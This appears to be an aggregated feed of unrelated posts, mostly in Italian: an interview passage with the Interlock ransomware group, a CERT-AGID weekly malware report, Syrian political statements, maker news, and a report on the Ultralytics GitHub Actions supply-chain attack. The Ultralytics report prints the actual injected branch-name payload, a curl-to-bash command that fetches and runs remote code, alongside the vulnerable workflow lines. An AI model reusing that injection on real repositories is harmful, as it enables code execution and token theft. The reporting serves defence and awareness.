Interlock: Puoi tracciare tutte le aziende sul nostro sito. Le aziende non elencate hanno ricevuto una lezione preziosa, hanno corretto i loro errori e meritano rispetto per le loro azioni.
7 – RHC: Ora parliamo della vostra soluzione. In che modo il vostro ransomware si differenzia da altri ransomware come il famoso LockBit 3.0 o Akira? Se dovessi spiegare a un potenziale affiliato perché iniziare una partnership con te, cosa diresti da un punto di vista tecnico riguardo alla tua soluzione?
Interlock: Non spieghiamo i vantaggi del nostro programma ai potenziali partner. Innanzitutto, verifichiamo che i nostri partner siano black hat competenti con esperienza sufficiente per valutare il nostro software. Non accettiamo principianti.
8 – RHC: Siete tra i pochi gruppi ad aver sviluppato un ransomware per FreeBSD, una piattaforma robusta utilizzata in ambienti complessi come i data center (WhatsApp, Playstation, pfSense) e le infrastrutture critiche. Come siete arrivati a scegliere FreeBSD come vostro obiettivo e quali sfide tecniche avete dovuto affrontare nello sviluppo di un ransomware per questo sistema?
Interlock: Non ci sono state difficoltà con FreeBSD. Avevamo un obiettivo e lo abbiamo raggiunto.
9 – RHC: Quali vulnerabilità o errori di configurazione riscontrate più frequentemente nei vostri obiettivi? Ci sono delle tendenze comuni che avete osservato nelle infrastrutture aziendali compromesse?
Interlock: La tendenza principale è il fattore umano. Vediamo la frustrazione consumare gli amministratori di rete al lavoro, fanno tutto tranne il loro lavoro. Pornografia, shopping online senza fine, servizi di intrattenimento e social media dominano il loro tempo.
11 – RHC: Come valutate l’efficacia delle attuali difese di sicurezza informatica adottate dalle aziende? Esistono soluzioni o pratiche che, secondo voi, renderebbero i sistemi più sicuri contro attacchi come il vostro?
Interlock: Le misure di sicurezza stanno migliorando, il che è entusiasmante, è una nuova sfida per noi. Sebbene esistano metodi per complicare gli attacchi, le reti completamente sicure sono un’utopia. I rischi possono essere ridotti, ma non eliminati del tutto.
12 – RHC: Se dovessi dare un consiglio a un’azienda che non ha ancora un programma di sicurezza informatica in atto, quale sarebbe la prima cosa da fare?
Interlock: pensa attentamente, poi fai una scelta, non il contrario.
13 – RHC: Nel secondo trimestre del 2024, gli attacchi ransomware sono cresciuti in modo significativo, lo segnalate anche sul vostro sito. Cosa pensate di questa tendenza? Pensate che potremmo raggiungere un punto di saturazione o di “equilibrio”, in cui le aziende adotteranno difese che renderanno attacchi come il vostro meno efficaci?
Interlock: Apsis arriverà sempre, e poi inizierà un nuovo gioco con nuove regole e nuovi giocatori.
14 – RHC: Il vostro manifesto ci ha stupiti per la comunicazione. Parla di “lezioni che le aziende non dimenticheranno”. Avete mai osservato aziende o individui imparare effettivamente lezioni dai vostri attacchi? Come vi sentiresti se le aziende migliorassero drasticamente le loro difese?
Interlock: Quasi tutte le aziende rafforzano le loro difese dopo averci incontrato. Tuttavia, alcune non riescono a imparare la lezione e continuano a usare metodi obsoleti. Questo non dura a lungo.
15 – RHC: Molti ransomware hanno colpito anche istituzioni pubbliche, ospedali e settori critici, causando danni a persone innocenti. Come scegliete le vostre vittime e cosa dire dei danni collaterali che possono colpire persone esterne all’azienda? Avete policy interne che proibiscono obiettivi specifici?
Interlock: Paradossalmente, sistemi critici come istituzioni pubbliche e ospedali hanno spesso una protezione minima. Questa mancanza di investimenti in sicurezza evidenzia la necessità di dare priorità alla loro difesa.
16 – RHC: L’intelligenza artificiale è sempre più integrata nella sicurezza informatica. Cosa pensate dei tentativi di usare l’intelligenza artificiale per anticipare, prevenire e mitigare attacchi come il vostro? Ci sono contromisure particolari che intendete adottare in risposta a questa tecnologia?
Interlock: L’intelligenza artificiale cambia il campo di gioco. Ci divertiamo con questo gioco e ci evolviamo per contrastarlo.
17 – RHC: Siete d’accordo con l’affermazione “se usi un computer ma non ti sforzi di proteggerlo (e quindi non conosci lo strumento), non meriti di usarlo”?
Interlock: Dimentica le restrizioni che tutti dovrebbero avere quando usano i computer. Gli errori capitano a tutti.
18 – RHC: Sul vostro DLS si evince una certa sensibilità nell’area della sicurezza informatica. Sebbene le vostre azioni possano essere giudicate solo in base alle statistiche sulla criminalità, cosa vi ha realmente motivato a entrare in quest’area escludendo il denaro?
Interlock: denaro + informazioni, cosa potrebbe essere meglio?
19 – RHC: Vi siete mai offerti a spiegare a una vittima i difetti che avete sfruttato e come risolverli per evitare attacchi futuri?
Interlock: No, non l’abbiamo fatto.
20 – RHC: Qual è secondo voi la vera motivazione per cui lo stato dell’arte nel mondo della sicurezza informatica è scarso nonostante gli investimenti (sia finanziari che di altro tipo) nel settore? Pensate che ci sia solo molta apparenza e poca sostanza?
Interlock: La sicurezza informatica rimane scarsa perché gli sforzi si concentrano su misure reattive, strumenti appariscenti e di conformità invece di affrontare questioni fondamentali come talento, implementazione e basi di sicurezza.
22 – RHC: Qual è la configurazione errata/vulnerabilità più stupida che avete trovato sulle reti delle vittime?
Interlock: l’amministratore di dominio di un’azienda globale ha utilizzato un singolo spazio come password.
23 – RHC: Cosa diresti a qualcuno che ti dicesse che dovresti contribuire a rendere sicure le reti invece di abusarne solo per motivi economici?
Interlock: “Stiamo già contribuendo a renderle più sicure. Dagli tempo e te ne accorgerai tu stesso.”
24 – RHC: Qual è il primo suggerimento che daresti a qualcuno che vuole iniziare a mettere su ub nuovo RaaS? In base alla vostra esperienza, quali sono stati gli aspetti più difficili e quelli più facili?
Interlock: Valuta i rischi e se sei pronto ad accettarli, ti auguriamo buona fortuna. L’impossibile è possibile.
25 – RHC: Ultimamente, le intelligence e le agenzie governative hanno condotto diverse campagne per distruggere le risorse digitali delle operazioni di criminalità informatica. Quali sono le vostre considerazioni a riguardo? Vi preoccupa?
Interlock: Sì, siamo preoccupati quando i poliziotti sono alle nostre spalle, ma non gli voltiamo mai le spalle.
26 – RHC: Infine, se poteste inviare un messaggio alle aziende che considerate “negligenti” e che sottovalutano il valore dei dati, quale sarebbe il tuo consiglio? Cosa dovrebbero cambiare oggi per evitare di essere bersagli futuri?
Interlock: Non sprecare energie e tempo. Lo faremo noi per te. 😉
27 – RHC: Grazie mille ragazzi per l’intervista. Facciamo queste interviste per far capire ai nostri lettori che la sicurezza informatica è un argomento puramente tecnico e che per poter vincere la lotta contro la criminalità informatica dobbiamo essere più forti di voi, che siete noti per essere spesso un passo avanti a tutti. C’è qualcosa che vorreste dire ai nostri lettori o alle potenziali vittime delle vostre operazioni?
Interlock: La sicurezza informatica è uno sforzo di squadra. Mentre i Black Hat sono spesso un passo avanti, restare vigili, usare password complesse e mantenere il software aggiornato può fare un’enorme differenza.
L'articolo RHC DarkLab Intervista Interlock Ransomware. “Non sprecare energie e tempo. Lo faremo noi per te!” proviene da il blog della sicurezza informatica.
Magic Eye Images In Your Spreadsheet
Ah, the 1990s. It was a simpler time, when the web was going to be democratic and decentralised, you could connect your Windows 95 PC to the internet without worrying much about it being compromised, and freely download those rave music MP3s. Perhaps you had a Global Hypercolor T-shirt and spent a summer looking like the sweaty idiot you were, and it’s certain you desperately squinted at a magic eye image in a newspaper (remember newspapers?) trying to see the elephant or whatever it was. If you’d like to relive that experience, then [Dave Richeson] has a magic eye image generator for Microsoft Excel.
Unfortunately a proportion of the population including your scribe lack the ability to see these images, a seemingly noise-like pattern of dots on the page computationally generated to fool the visual processing portion of your brain to generate a 3D image. The Excel sheet allows you to create the images, but perhaps most interesting is the explanation of the phenomenon and mathematics which go along with it. Along with a set of test images depicting mathematical subjects, it’s definitely worth a look.
You can download a template and follow the instructions, and from very limited testing here we can see that LibreOffice doesn’t turn its nose up at it, either. Give it a go, and learn afresh the annoyance of trying to unfocus your eyes.
FormBook, Rhadamanthys e AgentTesla i Malware Più Diffusi in Italia
In questa settimana, il CERT-AGID ha riscontrato ed analizzato, nello scenario italiano di suo riferimento un totale di 37 campagne malevole, di cui 20 con obiettivi italiani e 17 generiche che hanno comunque interessato l’Italia, mettendo a disposizione dei suoi enti accreditati i relativi 622 indicatori di compromissione (IoC) individuati.
Riportiamo a seguire il dettaglio delle tipologie illustrate nei grafici, risultanti dai dati estratti dalle piattaforme del CERT-AGID e consultabili tramite la pagina delle Statistiche.
Andamento della settimana
Sono 16 i temi sfruttati questa settimana per veicolare le campagne malevole sul territorio italiano. In particolare si rileva:
- Fattura – Argomento utilizzato per veicolare tramite campagne generiche i malware AgentTesla, Formbook e Rhadamanthys, oltre a essere stato utilizzato per due campagne di phishing italiane a tema Aruba, veicolate tramite PEC compromesse, e una campagna di phishing DocuSign generica.
- Legale – Tema servito per veicolare numerosi malware, tra cui PureLogs Stealer, AsyncRAT, RedLine, Rhadamanthys e XMrig, tutti tramite campagne italiane.
- Ordine – Argomento utilizzato per una campagna di phishing generica a tema Webmail, oltre ad essere servito per veicolare i malware Rhadamanthys tramite Guloader e SnakeKeylogger.
- Pagamenti – Tema sfruttato per una campagna generica di phishing ai danni di utenti di Office365 oltre che per due campagne generiche finalizzate alla distribuzione dei malware AgentTesla e Formbook.
- Banking – Argomento ricorrente questa settimana, sfruttato per tre campagne veicolate tramite PEC e rivolte a clienti di Intesa Sanpaolo.
Il resto dei temi sono stati utilizzati per veicolare campagne di malware e di phishing di vario tipo.
Eventi di particolare interesse
- Si è riscontrato un incremento nell’utilizzo delle caselle PEC compromesse o fraudolente per la diffusione di campagne di phishing a tema bancario. Particolarmente attive risultano le campagne ai danni di utenti Intesa SanPaolo. Gli attaccanti sfruttano la fiducia riposta nella posta certificata per veicolare link a finte repliche della pagina dell’home banking con lo scopo di sottrarre credenziali di accesso e dati di carte di pagamento. Nuovi Indicatori di Compromissione (IoC) sono stati resi disponibili nella news del CERT-AGID.
- La scorsa settimana il CERT-AGID ha rilevato un malware AgentTesla con meccanismo di attivazione difettoso. L’eseguibile, veicolato come allegato email, nonostante presentasse caratteristiche da file malevolo, non generava alcun traffico di rete e in prima battuta non è stato possibile determinare la sua precisa natura. Il comportamento insolito è stato corretto nei giorni successivi con una nuova versione del malware diffusa con una nuova campagna. Un’analisi al riguardo è stata pubblicata sul sito del CERT-AGID.
Malware della settimana
Sono state individuate, nell’arco della settimana, 11 famiglie di malware che hanno interessato l’Italia. Nello specifico, di particolare rilievo, troviamo le seguenti campagne:
- FormBook – Rilevate una campagna italiana a tema “Delivery” e due campagne generiche a tema “Pagamenti” e “Fattura”, veicolate tramite email con allegati ZIP e RAR.
- Rhadamanthys via GuLoader – Individuate una campagna italiana a tema “Legale” e due campagne generiche a tema “Ordine” e “Fattura”, diffuse tramite email con allegati XLSX e PDF o link a file malevoli.
- AgentTesla – Rilevate due campagne generica a tema “Pagamenti” e “Fattura”, diffuse mediante email con allegati ZIP.
- XMRig – Scoperta una campagna italiana a tema “Legale”, diffusa mediante email con allegato ZIP.
- PureLogs – Individuata una campagna italiana a tema “Legale”, veicolata tramite email con allegato BAT.
- Redline – Rilevata una campagna italiana a tema “Legale”, veicolata tramite email con allegato contenete file EXE.
- AsyncRAT – Individuata una campagna italiana a tema “Legale”, veicolata tramite email con allegato compresso contenete EXE.
- Remcos via GuLoader – Individuata una campagna italiana veicolata tramite email con allegato 7Z.
- KoiStelaer – Scoperta una campagna italiana veicolata tramite email con allegato ZIP.
- SnakeKeylogger – Individuata una campagna italiana a tema “Ordine”, diffusa tramite email con allegato Z.
- SpyNote – Individuata una campagna generica che sfrutta il tema “Aggiornamenti” e veicola l’APK malevolo tramite SMS.
L'articolo FormBook, Rhadamanthys e AgentTesla i Malware Più Diffusi in Italia proviene da il blog della sicurezza informatica.
In occasione della caduta del regime tirannico del Baath in Siria.
Ai popoli liberi della Siria: curdi, arabi, siriaci, assiri, musulmani, cristiani e yazidi.
Oggi voltiamo una pagina nera della storia moderna della Siria con la caduta del regime tirannico del Baath che ha governato il Paese con la repressione e il pugno di ferro per decenni.
Il nostro popolo ha sofferto per l’emarginazione, l’oppressione e la divisione attuate dal regime per distruggere il tessuto sociale e consolidare il proprio potere. Ma la volontà del popolo è più forte di qualsiasi regime tirannico, e qui stiamo contemplando una svolta storica verso la libertà e la dignità.
In questo momento critico chiediamo a tutte le componenti della Siria settentrionale e orientale di proteggere i risultati dell’amministrazione autonoma e di stringersi attorno alle Forze Democratiche Siriane (SDF) come garanti della sicurezza e della stabilità nelle aree liberate.
L’SDF ha dimostrato di essere una forza di unificazione nazionale che ha lavorato per proteggere la popolazione in tutte le sue componenti e crede nel pluralismo e nella democrazia come base per costruire il futuro della Siria.
Noi, partiti e forze che firmano questa dichiarazione, mentre ci congratuliamo con il nostro popolo per la caduta del regime di oppressione e tirannia, affermiamo che spetta a noi aprire una nuova fase per:
- Garantire la sicurezza e la stabilità attraverso la cooperazione con le forze nazionali sul terreno, impedendo qualsiasi tentativo di seminare il caos o di tornare indietro.
- Promuovere un dialogo nazionale tra tutte le componenti del popolo siriano senza discriminazioni o esclusioni per creare le basi di una nuova Siria.
- Costruire una Siria pluralista, democratica e decentrata, dove ogni componente abbia il diritto di gestire i propri affari, dove i diritti umani siano rispettati e dove giustizia ed equità siano preservate per tutti.
Invitiamo inoltre il nostro popolo a essere vigile e responsabile, poiché la nuova fase è piena di sfide, ma anche di speranze, per costruire una patria democratica in cui prevalgano pace e giustizia.
Lavoriamo per una Siria democratica, pluralista e decentrata.
Gloria ai martiri della libertà.
Partiti e forze che firmano la dichiarazione:
- Congresso Nazionale del Kurdistan (KNK)
- Partito dell’Unione Democratica.
- Partito Verde Democratico.
- Partito della Pace e della Democrazia del Kurdistan.
- Partito Liberale del Kurdistan.
- Partito Comunista del Kurdistan.
- Partito Democratico del Kurdistan -Siria.
- Partito Democratico Curdo Siriano.
- Partito della Sinistra Curda in Siria.
- Partito della Sinistra Democratica Curda in Siria.
- Partito del futuro siriano.
- Partito del cambiamento democratico del Kurdistan.
- Partito del Rinnovamento del Kurdistan.
- Unione dei lavoratori del Kurdistan.
Dal congresso nazionale curdo
In occasione della caduta del regime tirannico del Baath in Siria. Ai popoli liberi della Siria: curdi, arabi, siriaci, assiri, musulmani, cristiani e yazidi.Rifondazione Comunista
Silicon Carbide May Replace Zirconium Alloys for Nuclear Fuel Rod Cladding
Since the construction of the first commercial light water nuclear power plants (LWR) the design of their fuel rods hasn’t changed significantly. Mechanically robust and corrosion-resistant zirconium alloy (zircalloy) tubes are filled with ceramic fuel pellets, which get assembled into fuel assemblies for loading into the reactor.A 12′ SiGa fuel assembly, demonstrating the ability to scale to full-sized fuel rods. (Credit: DoE)
Now it seems that silicon carbide (SiC) may soon replace the traditional zirconium alloy with General Atomics’ SiGa fuel cladding, which has been tested over the past 120 days in the Advanced Test Reactor at Idaho National Laboratory (INL). This completes the first of a series of tests before SiGa is approved for commercial use.
One of the main advantages of SiC over zircalloy is better resistance to high temperatures — during testing with temperatures well above those experienced with normal operating conditions, the zircalloy rods would burst while the SiC ones remained intact (as in the embedded video). Although normally SiC is quite brittle and unsuitable for such structures, SiGa uses SiC fibers, which allows it to be used in this structural fashion.
Although this development is primarily part of the Department of Energy’s Accident Tolerant Fuel Program and its focus on melt-down proof fuel, the switch to SiC could also solve a major issue with zirconium, being its use as a catalyst with hydrogen formation when exposed to steam. Although with e.g. Fukushima Daiichi’s triple meltdown the zircalloy fuel rods were partially destroyed, it was the formation of hydrogen gas inside the reactor vessels and the hydrogen explosions during venting which worsened what should have been a simple meltdown into something significantly worse.
youtube.com/embed/x7DvtG3tlhE?…
Hackaday Links: December 8, 2024
For some reason, we never tire of stories highlighting critical infrastructure that’s running outdated software, and all the better if it’s running on outdated hardware. So when we learned that part of the San Francisco transit system still runs on 5-1/4″ floppies, we sat up and took notice. The article is a bit stingy with the technical details, but the gist is that the Automatic Train Control System was installed in the Market Street subway station in 1998 and uses three floppy drives to load DOS and the associated custom software. If memory serves, MS-DOS as a standalone OS was pretty much done by about 1995 — Windows 95, right? — so the system was either obsolete before it was even installed, or the 1998 instance was an upgrade of an earlier system. Either way, the San Francisco Municipal Transportation Agency (SFMTA) says that the 1998 system due to be replaced originally had a 25-year lifespan, so they’re more or less on schedule. Replacement won’t be cheap, though; Hitachi Rail, the same outfit that builds systems that control things like the bullet train in Japan, is doing the job for the low, low price of $212 million.
We don’t know who needs to here this, but we got a tip from Clem Mayer about upcoming changes to EU regulations that might affect the maker community. It concerns the General Product Safety Regulations, or GPSR, which appears to be an extension of current rules that will impose additional compliance burdens on anyone selling products to the EU market on online marketplaces. We won’t pretend to know the intricacies of GPSR, or even the basics, but Smander.com has a brief summary of the rules and how best to comply, which seems to amount to retaining the services of a company to take care of the compliance paperwork. We also took a look at the official EU information page for GPSR, which is pretty thin on information but at least it’s a primary source. If you’re selling kits or other products into the EU market, chances are good that you’re going to need to figure this out, and soon — seems like the rules go into effect December 13th.
You’ve got to feel for the authors of open-source software. As if developing, maintaining, and supporting the software that keeps the Internet running wasn’t a thankless enough job, you can actually get doxxed by your own creation. A case in point is Daniel Stenberg, the original author and lead developer on curl and libcurl. His name and email address are often found in the documentation for products using his software, so frustrated users who find his contact information tend to reach out to him after being ignored by the product’s support team. It seems annoying, and we sympathize with Daniel and others like him, but then again, it’s a measure of your impact that your contact information is literally everywhere.
If you’re in the market for a unique gift for the geek in your life and have an extra $230 to spread around, check out this custom Lego kit of the ASML TWINSCAN EXE:500 extreme UV lithography machine. Actually, strike that; now that we look at the specs, this kit is tiny. It’s only 851 pieces and 13.9″ (35 cm) wide when assembled, and isn’t exactly a richly detailed piece. Sure, Lego kits are fun, but there seem to be much better choices out there; we had a blast putting together the Apollo 11 Lunar Module Eagle kit a few years back, and that was only about $70.
And finally, Festo fans will want to check out this literal air guitar from the automation company’s “Experience Center” in Lupfig, Switzerland. Festo engineers bedazzled an acoustic guitar with pneumatic cylinders and control valves and programmed the system to pluck out the intro riff from AC/DC’s “Thunderstruck.” It’s actually pretty good, and we especially appreciate the pneumatic party whistle that chips in from time to time. There’s a missed opportunity here, though; we really expected a pneumatic cylinder to do the characteristic double rap on the body of the guitar when you get to the “Thun-der!” part. Too bad — maybe for version two.
youtube.com/embed/Oatc1QpXyQc?…
La scoperta di una vulnerabilità negli ATM: basta un gesto per svelare i segreti
@Informatica (Italy e non Italy 😁)
Gli sportelli automatici (ATM), pilastri del nostro sistema bancario, sono generalmente percepiti come dispositivi sicuri. Tuttavia, come ci dimostra la ricerca condotta da Enes_0425, un ricercatore di sicurezza informatica, queste macchine possono
La rete antimafia @ON si riunisce a Roma
Recentemente a Roma, presso il Centro Operativo DIA, si è tenuto un meeting della Rete @ON (Antimafia Operational Network) con i rappresentanti delle Forze di Polizia di Belgio, Germania, Francia, Paesi Bassi, Spagna ed EUROPOL che unitamente, all’Italia rappresentano il Core Group del Network.
La DIA (Direzione Investigativa Antimafia) sostiene con impegno l’azione di contrasto internazionale alle mafie, anche attraverso una mirata attività di cooperazione di Polizia per il contrasto del fenomeno transnazionale delle più pericolose organizzazioni criminali.
Il recente evento romano riveste un particolare valore simbolico in quanto ricaduto a 10 anni esatti dall’istituzione della Rete @ON, con la risoluzione del 4 dicembre 2014 del Consiglio dell’Unione Europea, promossa dalla DIA, quale risultato del Dipartimento della Pubblica Sicurezza nel corso del Semestre di Presidenza italiana di turno.
Lo scopo della Rete @ON è quello di rafforzare la cooperazione delle Forze di Polizia contro i principali gruppi della criminalità organizzata, anche di tipo mafioso, che hanno un impatto sulla sicurezza dei cittadini europei.
I gruppi criminali sottoposti ad attenzione sono italiani, di etnia albanese, euroasiatici, bande di motociclisti, ma anche quelli emergenti (Moccro Maffie, nigeriane ed altre) che pongono un serio rischio per la sicurezza e l’economia dell’UE.
La DIA ha promosso, ottenuto e gestito – quale leader dell’iniziativa – progressivi finanziamenti della Commissione UE per sostenere le attività operative delle 51 Agenzia di Polizia che aderiscono al Network in rappresentanza di 44 Paesi.
Ad oggi il Network sta supportando le Unità investigative partner in 216 investigazioni e ha finanziato 617 missioni in favore di oltre 2.500 investigatori che hanno portato all’arresto di 1.068 persone, inclusi 15 latitanti oltre al sequestro di circa 271 milioni di euro, droga, veicoli, beni di lusso ed armi.
Pedaling your Mobile Web Server Across the Globe
We tinkerers often have ideas we know are crazy, and we make them up in the most bizarre places, too. For example, just imagine hosting a website while pedaling across the world—who would (not) want that? Meet [Jelle Reith], a tinkerer on an epic cycling adventure, whose bicycle doubles as a mobile web server. [Jelle]’s project, jelle.bike, will from the 6th of December on showcase what he’s seeing in real time, powered by ingenuity and his hub dynamo. If you read this far, you’ll probably guess: this hack is done by a Dutchman. You couldn’t be more right.
At the heart of [Jelle]’s setup is a Raspberry Pi 4 in a watertight enclosure. The tiny powerhouse runs off energy generated by a Forumslader V3, a clever AC-to-DC converter optimized for bike dynamos. The Pi gets internet access via [Jelle]’s phone hotspot, but hosting a site over cellular networks isn’t as simple as it sounds. With no static IP available, [Jelle] routes web traffic through a VPS using an SSH tunnel. This crafty solution—expanded upon by Jeff Geerling—ensures seamless access to the site, even overcoming IPv6 quirks.
The system’s efficiency and modularity exemplify maker spirit: harnessing everyday tools to achieve the extraordinary. For more details, including a parts list and schematics, check out [Jelle]’s Hackaday.io project page.
La fine del cinquantennale regime degli Assad segna una vittoria per la Turchia, gli USA, Israele e le petromonarchie che hanno sostenuto per tredici anni la guerra per procura delle forze jihadiste. Il piano statunitense di disgregazione dei grandi stati che erano stati protagonisti molti decenni fa del nazionalismo panarabista dopo Iraq e Libia ha avuto come bersaglio la Siria. Il regime, indebolito dalla guerra civile, dalle sanzioni e dall’occupazione americana dei suoi siti petroliferi, non ha retto ulteriormente senza il supporto di Hezbollah e Iran duramente colpiti da Israele. Non è chiaro cosa sia successo in questi giorni e il ruolo svolto dalla Russia e da altre potenze. La condanna della repressione che ha caratterizzato il regime laico degli Assad certo non giustifica lo sdoganamento come liberatori degli jihadisti di Al Quaeda come Jolani e il suo HTS o degli islamisti dello SNA che con l’esercito turco attaccano il Rojava curdo, l’unica realtà di autogoverno democratico e convivenza della regione. Il presunto liberatore di Damasco ha già definito il PKK di Ocalan organizzazione terrorista. Come al solito i media occidentali sdoganano come “ribelli” i fondamentalisti islamici quando sono al loro servizio. In questo contesto l’Italia e l’Unione Europea, dovrebbero operare per garantire il rispetto dei diritti umani dell’intera popolazione siriana, vera vittima di questa guerra eterna e del diritto internazionale, la salvaguardia dell’integrità territoriale della Siria, la protezione delle minoranze e del Rojava dall’aggressione islamista e turca. una transizione democratica attraverso una conferenza di pace con tutte le forze in campo sotto l’egida del segretario generale ONU e la costruzione delle condizioni per la convivenza di tutte le comunità con il metodo del confederalismo democratico, la determinazione della natura dello stato (confederale o federale) e delle istituzioni per arrivare a libere elezioni sotto supervisione dell’ONU. Va negato qualsiasi riconoscimento internazionale a formazioni terroristiche islamiste che intendano imporre sharia e persecuzione delle donne. Su questi obiettivi proponiamo di mobilitarci unitariamente in Italia e in Europa alle forze politiche e sociali di sinistra e antifasciste e ai movimenti pacifisti, antimperialisti e femministi. Al popolo siriano, in tutte le sue componenti, vanno garantiti pace, libertà e diritti, così come alle altre popolazioni martoriate del Medio Oriente.
Maurizio Acerbo, segretario nazionale del Partito della Rifondazione Comunista – Sinistra Europea
New Tullomer Filament Claims to Beat PEEK, Aluminium and Steel
Recently a company called Z-Polymers introduced its new Tullomer FDM filament that comes with a lofty bullet list of purported properties that should give materials like steel, aluminium, and various polymers a run for their money. Even better is that it is compatible with far lower specification FDM printers than e.g. PEEK. Intrigued, the folks over at All3DP figured that they’d should get some hands-on information on this filament and what’s it like to print with in one of the officially sanctioned Bambu Lab printers: these being the X1C & X1CE with manufacturer-provided profiles.
The world of engineering-grade FDM filaments has existed for decades, with for example PEEK (polyether ether ketone) having been around since the early 1980s, but these require much higher temperatures for the extruder (360+℃) and chamber (~90℃) than Tullomer, which is much closer (300℃, 50℃) to a typical high-performance filament like ABS, while also omitting the typical post-process annealing of PEEK. This assumes that Tullomer can match those claimed specifications, of course.
One of the current users of Tullomer is Erdos Miller, an engineering firm with a focus on the gas and oil industry. They’re using it for printing parts (calibration tooling) that used to be printed in filaments like carbon fiber-reinforced nylon (CF-PA) or PEEK, but they’re now looking at using Tullomer for replacing CF-PA and machined PEEK parts elsewhere too.
It’s still early days for this new polymer, of course, and we don’t have a lot of information beyond the rather sparse datasheet, but if you already have a capable printer, a single 1 kg spool of Tullomer is a mere $500, which is often much less or about the same as PEEK spools, without the requirement for a rather beefy industrial-strength FDM printer.
Muri digitali in Azione: esercitazioni Runet in Daghestan per isolare l’Internet russo dal mondo
Il 6 dicembre in Daghestan sono state registrate interruzioni nel funzionamento dei servizi online stranieri, tra cui WhatsApp, Telegram e YouTube. Il motivo è stato un esercizio di Roskomnadzor (Il Servizio federale per la supervisione delle comunicazioni, della tecnologia dell’informazione e dei mass media della federazione russa), nell’ambito del quale sono stati testati scenari per disabilitare l’accesso al segmento straniero di Internet.
Il provider Ellco ha riferito che dalle 16:00 l’accesso a una serie di servizi era limitato.
“Caro abbonato, in connessione con gli esercizi in corso di Roskomnadzor per testare scenari per disabilitare l’accesso al segmento straniero di Internet, oggi, 6 dicembre 2024, dalle 16:00, ci sono restrizioni all’accesso ad alcuni siti e servizi. (WhatsApp, ecc.) Purtroppo non possiamo influenzare questa situazione. Tempo di recupero stimato, 16:00 del 7/12/2024.”
Roskomnadzor ha spiegato a Kommersant che le esercitazioni hanno lo scopo di determinare l’efficacia della “infrastruttura di sostituzione delle chiavi” in caso di chiusura deliberata del segmento Internet russo dall’esterno. Inoltre, vengono individuati i sistemi informativi le cui prestazioni dipendono dalla comunicazione con servizi, biblioteche e altre risorse situate in reti di comunicazione straniere.
“Lo scopo dell’esercitazione è confermare la disponibilità dell’infrastruttura Internet russa a controllare i principali servizi stranieri e russi in caso di deliberata influenza esterna“, ha affermato l’RKN.
All’inizio di novembre, sui canali Telegram ha cominciato a circolare una lettera inviata dalla Banca Centrale alle banche russe, in cui si affermava che Roskomnadzor intende condurre esercizi a dicembre “per disabilitare l’accesso al segmento estero di Internet in alcune regioni”.
Quindi il dipartimento ha spiegato che la verifica della disponibilità dei sistemi chiave per garantire la sostenibilità della Runet viene effettuata annualmente, il programma per la loro attuazione è approvato dal Ministero dello sviluppo digitale della Russia in accordo con l’FSB della Russia e Roskomnadzor. “I controlli non influiscono sull’accesso a Internet degli utenti russi“, ha riferito RKN.
L'articolo Muri digitali in Azione: esercitazioni Runet in Daghestan per isolare l’Internet russo dal mondo proviene da il blog della sicurezza informatica.
Gazzetta del Cadavere reshared this.
La giustizia e il male
@Politica interna, europea e internazionale
L'articolo La giustizia e il male proviene da Fondazione Luigi Einaudi.
Tiny NFC-Powered Keychain Thermometer
What if your keychain could tell you the temperature, all while staying battery-free? That’s the essence of this innovative keychain ‘NFC_temp’ by [bjorn]. This nifty gadget harnesses energy from an NFC field—like the one created by your smartphone—to power itself just long enough to take a precise temperature reading. Using components like an ATTiny1626 microcontroller, a TMP117 thermometer, and an RF430CL330H NFC IC, NFC_temp cleverly stores harvested power in a capacitor to function autonomously.
The most impressive part? This palm-sized device (18×40 mm) uses a self-designed 13.56 MHz antenna to draw energy from NFC readers. The temperature is then displayed on the reader, with an impressive accuracy of ±0.1 °C. Creator [bjorn] even shared challenges, like switching from an analog sensor due to voltage instability, which ultimately led to his choice of the TMP117. Android phones work best with the tag, while iOS devices require a bit more angling for reliable detection.
Projects like NFC_temp underscore the creativity within open source. It’s a brilliant nod to the future of passive, wireless, energy-efficient designs. Since many of us will all be spending a lot of time around the Christmas tree this month, why not fit it in a bauble?
Supply Chain Sotto Attacco! La Libreria Python Ultralytics è stata violata
È stato attaccato il repository della libreria Python Ultralytics, ampiamente utilizzata nelle attività di visione artificiale. Approfittando di questa vulnerabilità, i criminali informatici hanno pubblicato versioni dannose della libreria su PyPI, progettate per il mining di criptovalute.
La vulnerabilità era associata al pacchetto ultralytics-actions, che automatizza l’avvio di gestori per determinate azioni nel repository. Questo è lo scopo per cui viene utilizzato il meccanismo GitHub Actions. Nel progetto Ultralytics, il gestore collegato all’evento pull_request_target ha chiamato il file format.yml per formattare il codice nelle richieste pull in entrata. Questo file eseguiva comandi shell con modelli di caratteri jolly come:
git pull origin ${{ github.head_ref || github.ref }}
git config –global utente.nome “${{ input.github_nomeutente }}”
git config –global user.email “${{ input.github_email }}”
Gli aggressori hanno inviato una richiesta pull al repository Ultralytics, specificando la seguente riga come nome del ramo:
openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)
Ciò ha comportato l’esecuzione del comando:
curl -sSfL raw.githubusercontent.com/…/file.sh | bash
Di conseguenza, gli aggressori hanno avuto accesso ai token del repository e ad altri dati riservati. Si ritiene che abbiano modificato il gestore di pubblicazione per rimuovere la verifica dell’account autorizzato a pubblicare versioni su PyPI e abbiano utilizzato la tecnica di avvelenamento della cache di build di GitHub Actions per inserire i propri dati nella versione.
La prima versione dannosa di Ultralytics, versione 8.3.41, è stata pubblicata su PyPI il 4 dicembre alle 23:51 (MSK) ed eliminata alle 12:15 del giorno successivo. Alle 15:47 è stata pubblicata un’altra versione 8.3.42, che è stata rimossa alle 16:47. Pertanto le versioni dannose sono rimaste disponibili per il download per circa 13 ore. Queste versioni contenevano codice che scaricava il componente di mining XMRig da un server esterno.
Gli sviluppatori hanno risolto rapidamente il problema e hanno rilasciato le versioni correttive 8.3.43 e 8.3.44. Due giorni dopo, però, gli aggressori hanno nuovamente pubblicato le versioni dannose 8.3.45 e 8.3.46, che contenevano un codice diverso. Fino al completamento dell’indagine, si consiglia agli utenti di astenersi dall’installare nuove versioni e di impegnare la versione 8.3.44 come dipendenze.
L'articolo Supply Chain Sotto Attacco! La Libreria Python Ultralytics è stata violata proviene da il blog della sicurezza informatica.
Maronno Winchester reshared this.
Aziende che legiferano: X aiuta ad aggiornare il Kids Online Safety Act nella spinta finale per l'approvazione alla Camera guidata dai repubblicani
